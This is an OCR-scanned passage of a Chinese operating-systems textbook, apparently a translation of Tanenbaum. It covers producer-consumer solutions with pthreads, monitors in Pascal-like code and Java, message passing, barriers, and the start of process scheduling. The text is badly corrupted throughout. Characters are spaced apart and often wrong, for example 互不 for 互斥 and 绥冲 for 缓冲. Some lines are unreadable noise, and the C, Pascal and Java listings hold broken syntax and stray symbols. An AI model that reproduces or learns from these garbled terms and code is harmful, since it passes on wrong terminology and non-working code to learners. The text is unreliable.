pthread_cond_init(&condp, 0); 
pthread_create(&con, 0, consumer, 0); 
pthread_create(&pro, 0, producer, 0); 
pthread_join(pro, 0); 

pthread_join(con, 0); 
pthread_cond_destroy(&condc); 
pthread_cond_destroy(&condp); 
pthread_mutex_destroy(&the_mutex); 


图 2-32 利用 线程 解决 生产 着 -消费 者 问题 
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有 了 信号 量 和 互 斥 量 之 后 ， 进 程 间 通 信 看 来 就 很 容易 了 ， 实 际 是 
这 样 的 吗 ? 答案 是 否定 的 。 请 仔细 考察 图 2-28 中 辐 缓 冲 区 放 入 数据 项 
以 及 从 中 删除 数据 项 之 前 的 down 操 作 。 假 设 将 生产 者 代码 中 的 两 个 
down 操 作 交 换 一 下 次 序 ， 将 使 得 mutex 的 值 在 empty 之 前 而 不 是 在 其 之 
后 被 减 1。 如 有 打 缓 冲 区 完全 满 了 ， 生 产 者 将 阻塞 ，mutex 值 为 0。 这 样 一 
来 ， 当 消费 者 下 次 试图 访问 缓冲 区 时 ， 它 将 对 mnutex 执 行 一 个 down 操 
作 ， 由 于 mutex 值 为 0%， 则 消费 者 也 将 阻塞 。 两 个 进程 都 将 永远 地 阻塞 
下 去 ， 无 法 再 进行 有 效 的 工作 ， 这 种 不 笠 的 状况 称 作 死 锁 (dead 
lock) 。 我 们 将 在 第 6 章 中 详细 讨论 死 锁 问 题 。 


指出 这 个 问题 是 为 了 说 明 使 用 信和 号 量 时 要 非常 小 心 。 一 处 很 小 的 
错误 将 导致 很 大 的 麻烦 。 这 束 像 用 汇编 语言 编程 一 样 ， 甚 至 更 糟 ， 因 
为 这 里 出 现 的 错误 都 是 竞争 条 件 、 死 锁 以 及 其 他 一 些 不 可 预测 和 不 可 
再 现 的 行为 。 


为 了 更 易于 编写 正确 的 程序 ，Brinch Hansen (1973) 和 Hoare 
(1974) 提出 了 一 种 高 级 同步 原 语 ， 称 为 管 程 (monitor) 。 在 下 面 的 
介绍 中 我 们 会 发 现 ， 他 们 两 人 提出 的 方案 略 有 不 同 。 一 个 管 程 是 一 个 
由 过 程 、 变 量 及 数据 结构 等 组 成 的 一 个 集合 ， 它 们 组 成 一 个 特殊 的 模 


块 或 软件 包 。 进 程 可 在 任何 需要 的 时 候 调 用 管 程 中 的 过 程 ， 但 它们 不 
能 在 管 程 之 外 声明 的 过 程 中 直接 访问 管 程 内 的 数据 结构 。 图 2-33 展 示 
了 用 一 种 抽象 的 、 类 Pascal 语 言 描述 的 管 程 。 这 里 不 能 使 用 C 语 言 ， 


为 管 程 是 语言 概念 而 C 语 言 并 不 文 持 它 。 


monitor example 
integer /; 
condition c; 


procedure producer‘ ); 


end; 


procedure consumer( ); 


end: 
end monitor: 


2-33 ff 


管 程 有 一 个 很 重要 的 特性 ， 即 任 一 时 刻 管 程 中 只 能 有 一 个 活跃 进 
程 ， 这 一 特性 使 管 程 能 有 效 地 完成 互 不 。 管 程 是 编程 语言 的 组 成 部 

分 ， 编 译 器 知道 它们 的 特殊 性 ， 因 此 可 以 采用 与 其 他 过 程 调 用 不 同 的 
方法 来 处 理 对 管 程 的 调用 。 上 典型 的 处 理 方法 是 ， 当 一 个 进程 调用 管 程 
过 程 时 ， 该 过 程 中 的 前 儿 条 指令 将 检查 在 管 程 中 古 否 有 其 他 的 活跃 进 


程 。 如 果 有 ， 调 用 进程 将 被 挂 起 ， 直 到 另 一 个 进程 离开 管 程 将 其 唤 
桓 。 如 有 果 没 有 活跃 进程 在 使 用 管 程 ， 则 该 调用 进程 可 以 进入 。 


进入 管 程 时 的 互 不 由 编译 器 人 负责 ， 但 通常 的 做 法 十 用 一 个 互 不 量 
或 二 元 信号 量 。 因 为 是 由 编译 器 而 非 程序 员 来 安排 互 不 ， 所 以 出 错 的 
可 能 性 要 小 得 多 。 在 任 一 时 刻 ， 写 管 程 的 人 无 须 关 心 编译 右 是 如 何 实 
现 互 不 的 。 他 只 需 知道 将 所 有 的 临界 区 转换 成 管 程 过 程 即 可 ， 决 不 会 
有 两 个 进程 同时 执行 临界 区 中 的 代码 。 


尽管 如 我 们 上 边 所 看 到 的 ， 管 程 提 供 了 一 种 实现 互 不 的 简便 途 
径 ， 但 这 还 不 够 。 我 们 还 需要 一 种 办 法 使 得 进程 在 无 法 继续 运行 时 被 
阻塞 。 在 生产 者 -消费 者 问题 中 ， 很 容易 将 针对 缓冲 区 满 和 缓冲 区 空 的 
测试 放 到 管 程 过 程 中 ,但 是 生产 者 在 发 现 缓冲 区 满 的 时 候 如 何 阻塞 
We’? 


解决 的 方法 是 引入 条 件 变量 (condition variables) 以 及 相关 的 两 个 
PRIF: wait 和 signal。 当 一 个 管 程 过 程 发 现 它 无 法 继续 运行 时 (例如 ， 
生产 者 发 现 缓冲 区 满 ) ， 它 会 在 某 个 条 件 变量 上 (如 full) 执行 wait 操 
作 。 该 操作 导致 调用 进程 目 身 阻 塞 ， 并 且 还 将 另 一 个 以 前 等 在 管 程 之 
外 的 进程 调 入 管 程 。 在 前 面 介绍 pthread 时 我 们 已 经 看 到 条 件 变 量 及 其 
操作 了 。 


另 一 个 进程 ， 比 如 消费 者 ， 可 以 唤醒 正在 睡 眼 的 伙伴 进程 ， 这 可 
以 通过 对 其 伙伴 正在 等 待 的 一 个 条 件 变量 执行 signal 完 成 。 为 了 避免 管 
程 中 同时 有 两 个 活跃 进程 ， 我 们 需要 一 条 规则 来 通知 在 signal 之 后 该 怎 
么 办 。Hoare 建 议 让 新 唤醒 的 进程 运行 ， 而 挂 起 另 一 个 进程 。Brinch 
Hansen 则 建议 执行 signal 的 进程 必须 立即 退出 管 程 ， 即 signal 语 句 只 可 
能 作为 一 个 管 程 过 程 的 最 后 一 条 语句 。 我 们 将 采纳 Brinch Hansen 的 建 
议 ， 因 为 它 在 概念 上 更 简单 ， 并 且 更 容易 实现 。 如 果 在 一 个 条 件 变 量 
上 有 若干 进程 正在 等 待 ， 则 在 对 该 条 件 变 量 执行 signal 操 作 后， 系统 调 
度 程 序 只 能 在 其 中 选择 一 个 使 其 恢复 运行 。 


顺便 提 一 下 ， 还 有 一 个 Hoare 和 Brinch Hansen 都 没有 提 及 的 第 三 种 
方法 ， 该 方法 让 发 信号 者 继续 运行 ， 并 且 只 有 在 发 信号 者 退出 管 程 之 
后 ， 才 人 允许 等 待 的 进程 开始 运行 。 


条 件 变 量 不 是 计数 器 ， 条 件 变 量 也 不 能 像 信号 量 那样 积累 信号 以 
便 以 后 使 用 。 所 以 ， 如 果 问 一 个 条 件 变量 发 送信 和 与， 但 是 在 该 条 件 变 
量 上 并 没有 等 竺 进程 ， 则 该 信号 会 永远 丢失 。 换 名 话说 ，wait 操 作 必 
须 在 signal 之 前 。 这 条 规则 使 得 实现 简单 了 许多 。 实 际 上 这 不 是 一 个 问 
题 ， 因 为 在 需要 时 ， 用 变量 很 容易 跟踪 每 个 进程 的 状态 。 一 个 原本 要 
执行 signal 的 进程 ， 只 要 检查 这 些 变量 便 可 以 知道 该 操作 是 否 有 必要 。 


在 图 2-34 中 给 出 了 用 类 Pascal 语 言 ， 通 过 管 程 实现 的 生产 者 -消费 
者 问题 的 解法 框架 。 使 用 类 Pascal 语 言 的 优点 在 于 清晰 、 简 单 ， 并 且 严 


格 符合 Hoare/Brinch Hansen 模 型 。 


monitor ProducerConsumer 
condition full, empty; 
integer count; 


procedure insert(item: integer); 
begin 

if count = N then wait(full); 

insert _item(item); 

count := count + 1; 

if count = | then signal(empty) 
end; 


function remove: integer; 
begin 
if count = 0 then wait(empty); 
remove = remove _item; 
count := count — 1; 
if count = N — 1 then signal(full) 


end; 


count := 0; 
end monitor; 


procedure producer; 
begin 
while true do 
begin 
item = produce _item;, 
ProducerConsumer.insert(item) 
end 
end; 


procedure consumer; 
begin 
while true do 
begin 
item = ProducerConsumer.remove: 
consume _item(item) 
end 


2-34 用 管 程 实现 的 生产 者 -消费 者 问题 的 解法 框架 。 一 次 只 能 有 
一 个 管 程 过 程 活 路 。 其 中 的 缓冲 区 有 N 个 村 


读者 可 能 会 觉得 wait 和 signal 操 作 看 起 来 像 前 面 提 到 的 sleep 和 
wakeup， 而 我 们 已 经 看 到 后 者 存在 严重 的 苋 争 条 件 。 是 的 ， 它 们 确实 
很 像 ， 但 是 有 个 很 关键 的 区 别 : sleep 和 wakeup 之 所 以 失败 是 因为 当 一 
个 进程 想 睡眠 时 另 一 个 进程 试图 去 唤醒 它 。 使 用 管 程 则 不 会 发 生 这 种 
情况 。 对 管 程 过 程 的 上 自动 互 不 保证 了 这 一 点 : 如 果 管 程 过 程 中 的 生产 
者 发 现 缓冲 区 满 ， 它 将 能 够 完成 wait 操 作 而 不 用 担心 调度 程序 可 能 会 
在 wait 完 成 之 前 切换 到 消费 者 。 甚 至 ， 在 wait 执 行 完成 而 且 把 生产 者 标 
志 为 不 可 运行 之 前 ， 根 本 不 会 允许 消费 着 进入 省 程 。 


尽管 类 Pascal 是 一 种 想象 的 语言 ， 但 还 是 有 一 些 真 正 的 编程 语言 
持 管 程 ， 不 过 它们 不 一 定 是 Hoare 和 Brinch Hansen 所 设计 的 模型 。 其 中 
一 种 语言 是 Java。Java 是 一 种 面向 对 象 的 语言 ， 它 支持 用 户 级 线程 ， 还 
人 允许 将 方法 (过 程 》 划 分 为 类 。 只 要 将 关键 词 synchronized 加 入 到 方法 
声明 中 ，Java 保 证 一 旦 某 个 线程 执行 该 方法 ， 就 不 允许 其 他 线程 执行 
该 对 象 中 的 任何 synchronized 方 法 。 


使 用 Java 管 程 解决 生产 者 -消费 者 问题 的 解法 如 图 2-35 所 示 。 该 解 
法 中 有 4 个 类 。 外 部 类 (outer class) ProducerConsumer 创 建 并 启动 两 个 
线程 ，p 和 c。 第 二 个 类 和 第 三 个 类 producer 和 consumer 分 别 包含 生产 者 
和 消费 者 的 代码 。 最 后 ， 类 our_monitor 是 管 程 ， 它 有 两 个 同步 线程 ， 


用 于 在 共享 缓冲 区 中 插入 和 取出 数据 项 。 与 前 面 的 例子 不 同 ， 我 们 在 
这 里 给 出 了 insert 和 remove 的 全 部 代码 。 


在 前 面 所 有 的 例子 中 ， 生 产 者 和 消费 者 线程 在 功能 上 与 它们 的 等 
同 部 分 是 相同 的 。 生 产 者 有 一 个 无 限 循环 ， 该 无 限 循 环 产生 数据 并 将 
数据 放 入 公共 缓冲 区 中 ; 消费 者 也 有 一 个 等 价 的 无 限 循环 ， 该 无 限 特 
环 从 公共 缓冲 区 取出 数据 并 完成 一 些 有 趣 的 工作 。 


该 程序 中 比较 意思 的 部 分 是 类 our_ monitor， 它 包含 缓冲 区 、 管 理 
变量 以 及 两 个 同步 方法 。 当 生产 者 在 insert 内 活动 时 ， 它 确信 消费 者 不 
能 在 remove 中 活动 ， 从 而 保证 更 新 变量 和 缓冲 区 的 安全 ， 且 不 用 担心 
竞争 条 件 。 变 量 count 记 录 在 缓冲 区 中 数据 项 的 数量 。 它 的 取 值 可 以 取 
从 0 到 N-1 之 间 任 何 值 。 变 量 l1o 征 缓冲 区 楼 的 序号 ， 指 出 将 要 取出 的 下 
一 个 数据 项 。 类 似 地 ，hi 是 绥 冲 区 中 下 一 个 将 要 放 入 的 数据 项 序号 。 
人 允许 lo=hi， 其 含义 是 在 绥 冲 区 中 有 0 个 或 N 个 数据 项 。count 的 值 说 明了 


完 间 是 哪 一 种 情形 。 


À~ 
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件 变量 。 反 之 ，Java 提 供 了 两 个 过 程 wait 和 notify， 分 别 与 Sleep 和 
wakeup 等 价 ， 不 过 ， 当 它们 在 同步 方法 中 使 用 时 ， 它 们 不 受 竞争 条 件 
约束 。 理 论 上 ， 方 法 wait 可 以 被 中 断 ， 它 本 吴 束 是 与 中 灯 有 关 的 代 
码 。Java 需 要 显 式 表示 异常 处 理 。 在 本 文 的 要 求 中 ， 只 要 认为 
go_to_sleep 就 是 去 睡眠 即 可 。 


通过 临界 区 互 不 的 自动 化 ， 管 程 比 信 号 量 更 容易 保证 并 行 编程 的 
正确 性 。 但 管 程 也 有 缺点 。 我 们 之 所 以 使 用 类 Pascal 和 Java， 而 不 像 在 
本 书 中 其 他 例子 那样 使 用 C 语 言 ， 并 不 是 没有 原因 的 。 正 如 我 们 前 面 提 
到 过 的 ， 管 程 是 一 个 编程 语言 概念 ， 编 译 占 必须 要 识别 管 程 并 用 某 种 
方式 对 其 互 不 做 出 安排 。C、Pascal 以 及 多 数 其 他 语言 都 没有 管 程 ， 所 
以 指望 这 些 编译 器 遵守 互 扩 规则 是 不 合理 的 。 实 际 中 ， 如 何 能 让 编译 
志 知 道 哪 些 过 程 属于 管 程 ， 哪 些 不 属于 管 程 呢 ? 


在 上 述 语 言 中 同样 也 没有 信和 号 量 ， 但 增加 信和 号 量 是 很 容易 的 : 读 
者 需要 做 的 就 是 癌 库 里 加 入 两 段 短小 的 汇编 程序 代码 ， 以 执行 up 和 
down 系 统 调用 。 编 译 右 甚至 用 不 着 知道 它们 的 存在 。 当 然 ， 操 作 系 统 
必须 知道 信号 量 的 存在 ， 或 至 少 有 一 个 基于 信和 号 量 的 操作 系统 ， 读 者 
仍旧 可 以 使 用 C 或 C++ (甚至 是 汇编 语言 ， 如 果 读 者 乐意 的 话 ) 来 编写 
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public class ProducerConsumer { 
Static final int N=100; ”// 定 义 缓冲 区 大 小 的 常量 
static producer p = new producer(); V/ 初始 化 一 个 新 的 生产 者 线程 
static consumer c = new consumer(); // 初始 化 一 个 新 的 消费 者 线程 
Static our_monitor mon = new our_monitor(); // 初始 化 一 个 新 的 管 程 


public static void main(String args[]){ 
p.start(); W 开始 生产 者 线程 
p OSANO: 人 开始 消费 者 线程 


static class producer extends Thread { 
public void run() {// run 方法 包含 了 线程 代码 
int item; 
while (true) {  // 生产 者 循环 
item = produce _item( ); 
mon.insert(item); 
} 


} 
private int produce_item(){...} /实际 生产 


static class consumer extends Thread { 
public void run() {// run 方 法 包含 了 线程 代码 
int item; Sins 
while (true) {  V 消费 者 循环 
item = mon.remove( ); 
consume _item (item); 
} 
} 
private void consume _item(int item) { ... JW 实际 消费 


} 


static class our_monitor { / 这 是 一 个 管 程 
private int buffer[] = new int[N]; — ; 
private int count = 0, lo = 0, hi = 0; // 计数 器 和 索引 


public synchronized void insert(int val) { 
if (count == N) go_to_sleep(); V 如 果 绥 冲 区 满 ， 则 进入 休眠 
buffer [hi] = val; / 向 缓冲 区 中 插入 一 个 新 的 数据 项 
hi=(hit+1)%N; /设置 下 一 个 数据 项 的 模 
count = count+1; /W 缓 冲 区 中 的 数据 项 又 多 了 一 项 
if (count == 1) notify( ); 1 如 果 消 费 者 在 休 眼 ， 则 将 其 唤醒 
} 


public synchronized int remove( ) { 
int val; 
if (count == 0) go_to_sleep(); /如 果 绥 冲 区 室 ， 进 入 休眠 
val = buffer [lo]; / 从 缓冲 区 中 取出 一 个 数据 项 
lo = (lo + 1) % N; 1/ 设置 待 取 数 据 项 的 模 
count=count 一 1;  // 缓冲 区 中 的 数据 项 数目 减少 1 
if (count == N — 1) notify(); // 如 果 生 产 者 在 休眠 ， 则 将 其 唤醒 
return val; 


} 
private void go_to_sleep() { try{wait( );} catch(InterruptedException exc) {};} 


Al 2-35 用 Java 语 言 实现 的 生产 者 -消费 者 问题 的 解法 


与 管 程 和 信和 号 量 有 关 的 另 一 个 问题 是 ， 这 些 机 制 都 是 设计 用 来 解 
决 访问 公共 内 存 的 一 个 或 多 个 CPU 上 的 互 斥 问 题 的 。 通 过 将 信和 号 量 放 
在 共 至 内 存 中 并 用 TSL 或 XCHG 指 令 来 保护 它们 ， 可 以 避免 莞 争 。 如 果 
一 个 分 布 式 系统 具有 多 个 CPU， 并 且 每 个 CPU 拥有 目 己 的 私有 内 存 ， 
它们 通过 一 个 局 域 网 相连 ， 那 么 这 些 原 语 将 失效 。 这 里 的 结论 是 : 信 
号 量 太 低 级 了 ， 而 管 程 在 少数 儿 种 编程 语言 之 外 又 无 法 使 用 ， 并 且 ， 
这 些 原 语 均 未 提供 机 器 间 的 信息 交换 方法 。 所 以 还 需要 其 他 的 方法 。 


2.3.8 ÄER E 


上 面 提 到 的 其 他 的 方法 就 是 消 妃 传递 (message passing) 。 这 种 进 
程 间 通信 的 方法 使 用 两 条 原 语 send 和 receive， 它 们 像 信号 量 而 不 像 管 
程 ， 是 系统 调用 而 不 古语 言 成 分 。 因 此 ， 可 以 很 容易 地 将 它们 加 入 到 
库 例 程 中 去 。 例 如 : 


send(destination, &message) ; 


和 


receive(source, &message); 


前 一 个 调用 同一 个 给 定 的 目标 发 送 一 条 消 轧 ， 后 一 个 调用 从 一 个 
给 定 的 源 〈 或 者 是 任意 源 ， 如 果 接 收 者 不 介意 的 话 ) 接收 一 条 消息 。 
HMA BAA, MRAR, ERAAN, BY 
者 ， 币 着 一 个 错误 码 立 即 返回 。 


1. 消 息 传递 系统 的 设计 要 点 


消 生 传 递 系统 面临 者 许多 信和 号 量 和 管 程 所 未 涉及 的 问题 和 设计 难 
点 ， 特 别 是 位 于 网 络 中 不 同 机 郝 上 的 通信 进程 的 情况 。 例 如 ， 消 息 有 
可 能 被 网 络 丢失 。 为 了 防止 消 轧 丢失 ， 发 送 方 和 接收 方 可 以 达成 如 下 


一 致 : 一 旦 接收 到 信息 ， 接 收 方 马上 回 送 一 条 特殊 的 确认 
(acknowledgement) 消息 。 如 果 发 送 方 在 一 段 时 间 间 隅 内 未 收 到 确 
WU, WERKE ° 


现在 考虑 消息 本 身 被 正确 接收 ， 而 返回 给 发 送 者 的 确认 信息 丢失 
的 情况 。 发 送 者 将 重 发 信息 ， 这 样 接收 者 将 接收 到 两 次 相同 的 消息 。 
对 于 接收 者 来 说 ， 如 何 区 分 新 的 消息 和 一 条 重 发 的 老 消息 是 非常 重要 
的 。 通 常 采 用 在 每 条 原始 消息 中 嵌入 一 个 连续 的 序号 来 解决 此 问题 。 
如 果 接 收 者 收 到 一 条 消息 ， 它 具有 与 前 面 某 一 条 消息 一 样 的 序号 ， 就 
知道 这 条 消息 是 重复 的 ， 可 以 忽略 。 不 可 靠 消息 传递 中 的 成 功 通信 问 
题 是 计算 机 网 络 的 主要 研究 内 容 。 更 多 的 信息 可 以 参考 相关 文献 
(Tanenbaum，1996) 。 


消息 系统 还 需要 解决 进程 命名 的 问题 ， 在 send 和 receive 调 用 中 所 指 
定 的 进程 必须 是 没有 二 义 性 的 。 身 份 认证 (authentication) 也 是 一 个 问 
题 。 比 如 ， 客 户 机 怎么 知道 它 是 在 与 一 个 真正 的 文件 服务 二 通信， 而 
不 是 与 一 个 冒充 者 通信 ? 


对 于 发 送 痢 和 接收 着 在 同一 台 机 万 上 的 情况 ， 也 存在 者 干 设计 问 
题 。 其 中 一 个 设计 问题 束 是 性 能 问题 。 将 消 轧 从 一 个 进程 复制 到 另 一 
个 进程 通常 比 信号 量 操作 和 进入 管 程 要 慢 。 为 了 使 消息 传递 变 得 高 
效 ， 人 们 已 经 做 了 许多 工作 。 例 如 ，Cheriton (1984) 建议 限制 信息 的 
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传递 。 


2. 用 消息 传递 解决 生产 者 -消费 者 问题 


现在 我 们 来 考察 如 何 用 消 恩 传递 而 不 是 共 孚 内 存 来 解决 生产 者 - 消 
费 首 问题 。 在 图 2-36 中 ， 我 们 给 出 了 一 种 解法 。 假 设 所 有 的 消 居 都 有 同 
样 的 大 小 ， 并 且 在 尚未 接收 到 发 出 的 请 妃 时 ， 由 操作 系统 目 动 进行 缓 
冲 。 在 该 解决 方 宁 中 共 使 用 N 条 消息 ， 这 束 类 似 于 一 块 共享 内 存 绥 促 区 
中 的 N 个 槽 。 消 费 着 首先 将 N 条 至 消 妃 发 送 给 生产 者 。 当 生产 者 癌 消 费 
者 传递 一 个 数据 项 时 ， 它 取 走 一 条 空 消 轧 并 送 回 一 条 填充 了 内 容 的 消 
忆 。 通 过 这 种 方式 ， 系 统 中 总 的 消 轧 数 保持 不 灾 ， 所 以 消 筷 都 可 以 存 
放 在 事先 确定 数量 的 内 存 中 。 


#define N 100 /* BPP AY BA */ 


void producer(void) 


int item; 
message m; /* 消息 缓冲 区 */ 


while (TRUE) { 
item = produce_item( ); 访 产 生 放 入 缓冲 区 的 一 些 数据 */ 
receive(consumer, &m); /* 等 待 消费 者 发 送 空 缓冲 区 */ 
build_message(&m, item); 改建 立 一 个 待 发 送 的 消息 */ 
send(consumer, &m); 1* 发 送 数据 项 给 消费 者 */ 


} 


void consumer(void) 
{ . . 
int item, i; 
message m; 


for (i = 0; i < N; i++) send(producer, &m); /* 发 送 N 个 空 缓冲 区 */ 

while (TRUE) { 
receive(producer, &m); 此 接收 包含 数据 项 的 消息 */ 
item = extract_item(&m); 主将 数据 项 从 消息 中 提取 出 来 */ 
send(producer, &m); 上 KERK AIK E AE Pa */ 
consume _item(item); [rs 处 理 数 据 项 */ 


Al 2-36 用 N 条 消 恩 实现 的 生产 者 -消费 者 问题 


如 有 果 生 产 者 的 速度 比 消费 者 快 ， 则 所 有 的 消息 最 终 都 将 被 十 满 ， 
等 待 消费 者 ， 生 产 者 将 被 阻塞 ， 等 待 返回 一 条 空 消 息 。 如 采 消 费 者 速 
度 快 ， 则 情况 正好 相反 : 所 有 的 消息 均 为 空 ， 等 待 生 产 者 来 填充 它 
们 ， 消 费 者 被 阻塞 ， 以 等 竺 一 条 填充 过 的 消 筷 。 


消息 传递 方式 可 以 有 许多 变 体 。 我 们 首先 介绍 如 何 对 消息 进行 编 
址 。 一 种 方法 是 为 每 个 进程 分 配 一 个 惟一 的 地 址 ， 让 消息 按 进程 的 地 


址 编 址 。 另 一 种 方法 是 引入 一 种 新 的 数据 结构 ， 称 作 信 箱 

(mailbox) 。 信 箱 是 一 个 用 来 对 一 定数 量 的 消息 进行 缓冲 的 地 方 ， 信 
箱 中 消息 数量 的 设置 方法 也 有 多 种 ， 典 型 的 方法 是 在 信箱 创建 时 确定 
消息 的 数量 。 当 使 用 信箱 时 ， 在 send 和 和 receive 调 用 中 的 地 址 参数 就 是 信 
箱 的 地 址 ， 而 不 是 进程 的 地 址 。 当 一 个 进程 试图 向 一 个 满 的 信箱 发 消 
居 时 ， 它 将 被 挂 起 ， 直 到 信箱 内 有 消 恩 被 取 走 ， 从 而 为 狐 消 奶 腾 出 空 
间 。 


对 于 生产 者 -消费 者 问题 ， 生 产 者 和 消费 者 均 应 创建 足够 容纳 N 条 
消 妃 的 信箱 。 生 产 痢 癌 请 费 痢 信箱 发 送 包 合 实 际 数据 的 消 轧 ， 消 费 痢 
则 加 生产 者 信箱 发 送 空 的 消 轧 。 当 使 用 信箱 时 ， 缓 冲 机 制 的 作用 坪 很 
清楚 的 ， 目 标 信箱 容纳 那些 已 被 发 送 但 尚未 被 目标 进程 接收 的 消 已 。 


使 用 信箱 的 发 一 种 极端 方法 是 彻 的 取消 缓冲 。 采 用 这 种 方法 时 ， 
如 果 send 在 receive 之 前 执行 ， 则 发 送 进程 被 阻塞 ， 直 到 receive 发 生 。 在 
执行 receive 时 ， 消 息 可 以 直接 从 发 送 者 复制 到 接收 者 ， 不 用 任何 中 间 
缓冲 。 类 似 地 ， 如 果 先 执行 receive， 则 接收 者 会 被 阻塞 ， 直 到 send 发 
生 。 这 种 方案 常 被 称 为 会 合 (rendezvous) 。 与 带 有 缓冲 的 消息 方案 相 
比 ， 该 方案 实现 起 来 更 容易 一 些 ， 但 却 降低 了 有 灵活 性 ， 因 为 发 送 者 和 
接收 者 一 定 要 以 步 步 紧 接 的 方式 运行 。 


通常 在 并 行程 序 设计 系统 中 使 用 消息 传递 。 例 如 ， 一 个 著名 的 消 
息 传递 系统 是 消息 传递 接口 (Message-Passing Interface, MPI) ， 它 广 


泛 应 用 在 科学 计算 中 。 有 关 该 系统 的 更 多 信息 ， 可 参考 相关 文献 
(Gropp 等 人 ，1994; Snir 等 人 ，1996) 。 


2.3.9 ”屏障 
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请 缆 者 类 情形 的 。 在 有 些 应 用 中 划分 了 奎 干 阶段 ， 并 且 规 是， 除非 所 
有 的 进程 都 束 绪 准备 着 手下 一 个 阶段 ， 否 则 任何 进程 都 不 能 进入 下 一 
个 阶段 。 可 以 通过 在 每 个 阶段 的 结尾 安置 屏障 (barrier) 来 实现 这 种 行 
为 。 当 一 个 进程 到 达 屏 障 时 ， 它 就 被 屏障 阻拦 ， 直 到 所 有 进程 都 到 达 
该 屏障 为 止 。 屏 障 的 操作 如 图 2-37 所 示 。 


图 2-37 屏障 的 使 用 : a) 进程 接近 屏障 ，b) 除 了 一 个 之 外 所 有 的 进程 
都 被 屏障 阻塞 ，c) 当 最 后 一 个 进程 到 达 屏 障 时 ， 所 有 的 进程 一 起 通过 


在 图 2-37a 中 可 以 看 到 有 四 个 进程 接近 屏障 ， 这 意味 着 它们 正在 运 
T, 但 是 还 没有 到达 每 个 阶段 的 结尾 。 过 了 一 会 儿 ， 第 一 个 进程 完成 
了 所 有 需要 在 第 一 阶段 进行 的 计算 。 它 接着 执行 barrier 原 语 ， 这 通常 是 


调用 一 个 库 过 程 。 于 是 该 进程 被 挂 起 。 一 会 儿 ， 第 二 个 和 第 三 个 进程 
也 完成 了 第 一 阶段 的 计算 ， 也 接着 执行 barrier 原 语 。 这 种 情形 如 图 2- 
37b 所 示 。 结 果 ， 当 最 后 一 个 进程 C 到 达 屏 障 时 ， 所 有 的 进程 就 一 起 被 
释放 ， 如 图 2-37c 所 示 。 


作为 一 个 需要 屏障 的 例 了 于， 考虑 在 物理 或 工程 中 的 一 个 典型 弛 豫 
问题 。 这 是 一 个 市 有 初 值 的 矩阵 。 这 些 值 可 能 代表 一 块 金属 板 上 各 个 
点 的 温度 值 。 基 本 想法 可 以 是 准备 计算 如 下 的 问题 : 要 花费 多 长 时 
间 ， 在 一 个 角 上 的 火焰 才能 传播 到 整个 板 上 。 


计算 从 当前 值 开始 ， 先 对 矩阵 进行 一 个 变换 ， 从 而 得 到 第 二 个 矩 
阵 ， 例 如 ， 运 用 热力 学 定律 考察 在 AT 之 后 的 整个 温度 分 布 。 然 后 ， 进 
程 不 断 重复 ， 随 着 金属 板 的 加 热 ， 给 出 样本 点 温度 随时 间 变 化 的 函 
数 。 该 算法 从 而 随时 间 变 化 生成 出 一 系列 答 阵 。 


现在 ， 我 们 设想 这 个 矩阵 非常 之 大 (比如 100 万 行 乘 以 100 万 
A) ， 所 以 需要 并 行 处 理 (可 能 在 一 台 多 人 处 理 器 上 ) 以 便 加 速 运算 。 
各 个 进程 工作 在 这 个 矩阵 的 不 同 部 分 ， 并 且 从 老 的 和 矩阵 按照 物理 定律 
计算 新 的 矩阵 元 素 。 但 是 ， 除 非 第 n 次 迭代 已 经 完成 ， 也 就 是 说 ， 除 非 
所 有 的 进程 都 完成 了 当前 的 工作 ， 否 则 没有 进程 可 以 开始 第 n+1 次 和 迭 
代 。 实 现 这 一 目标 的 方法 是 通过 编程 使 每 一 个 进程 在 完成 当前 迭代 部 
分 后 执行 一 个 barrier 操 作 。 只 有 当 全 部 进程 完成 工作 之 后 ， 新 的 矩阵 


(下 一 次 迭代 的 输入 ) 才 会 完成 ， 此 时 所 有 的 进程 会 被 释放 而 开始 新 
IATL ° 
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当 计 算 机 系统 是 多 道 程序 设计 系统 时 ， 通 常 就 会 有 多 个 进程 或 线 
程 同时 竞争 CPU。 只 要 有 两 个 或 更 多 的 进程 处 于 束 缮 状态 ， 这 种 情形 
吏 会 发 生 。 如 和 东 只 有 一 个 CPU 可 用 ， 那 么 吏 必 须 选 择 下 一 个 要 运行 的 
进程 。 在 操作 系统 中 ， 完 成 选择 工作 的 这 一 部 分 称 为 调度 程序 
(scheduler) ， 该 程序 使 用 的 算法 称 为 调度 算法 (scheduling 


algorithm) 。 


尽管 有 一 些 不 同 ， 但 许多 适用 于 进程 调度 的 处 理 方法 也 同样 适用 
于 线程 调度 。 当 内 核 管理 线程 的 时 候 ， 调 度 经 常 是 按 线程 级 别 的 ， 与 
线程 所 属 的 进程 基本 或 根本 没有 关联 。 下 面 我 们 将 首先 关注 适用 于 进 
程 与 线程 两 者 的 调度 问题 ， 然 后 会 明确 地 介绍 线程 调度 以 及 它 所 产生 


的 独特 问题 。 第 8 章 将 讨论 多 核 必 片 的 问题 。 


2.4.1 调度 介绍 


让 我 们 回 到 早期 以 磁带 上 的 卡片 作为 输入 的 批 处 理 系 统 时 代 ， 那 
时 的 调度 算法 很 简单 : 依次 运行 磁带 上 的 每 一 个 作业 。 对 于 多 道 程 序 
设计 系统 ， 调 度 算法 要 复杂 一 些 ， 因 为 经 常 有 多 个 用 户 等 候 服 务 。 有 
些 大 型 机 系统 仍旧 将 批 处 理 和 分 时 服务 结合 使 用 ， 需 要 调度 程序 决定 


下 一 个 运行 的 是 一 个 批 处 理 作 业 还 是 终端 上 的 一 个 交互 用 户 。 (顺便 
提 及 ， 一 个 批 处 理 作业 可 能 需要 连续 运行 多 个 程序 ， 不 过 在 本 节 中 ， 
我 们 假设 它 只 是 一 个 运行 单个 程序 的 请 求 。) 由 于 在 这 些 机 器 中 ， 
CPU 是 稀缺 资源 ， 所 以 好 的 调度 程序 可 以 在 提高 性 能 和 用 户 的 满意 度 
方面 取得 很 大 的 成 果 。 因 此 ， 大 量 的 研究 工作 都 花费 在 创造 陪 明 而 有 
效 的 调度 算法 上 了 。 


在 拥有 了 个 人 计算 机 的 优势 之 后 ， 整 个 情形 癌 两 个 方面 发 展 。 青 
先 ， 在 多 数 时 间 内 只 有 一 个 活动 进程 。 一 个 用 户 进 入 文字 处 理 软 件 编 
辑 一 个 文件 时 ， 一 般 不 会 同时 在 后 人 台 编 译 一 个 程序 。 在 用 户 向 文字 处 
理 软件 键入 一 条 命令 时 ， 调 度 程序 不 用 做 多 少 工作 来 判定 哪个 进程 要 
运行 一 一 惟一 的 候选 痢 十 文字 人 处理 软件 。 


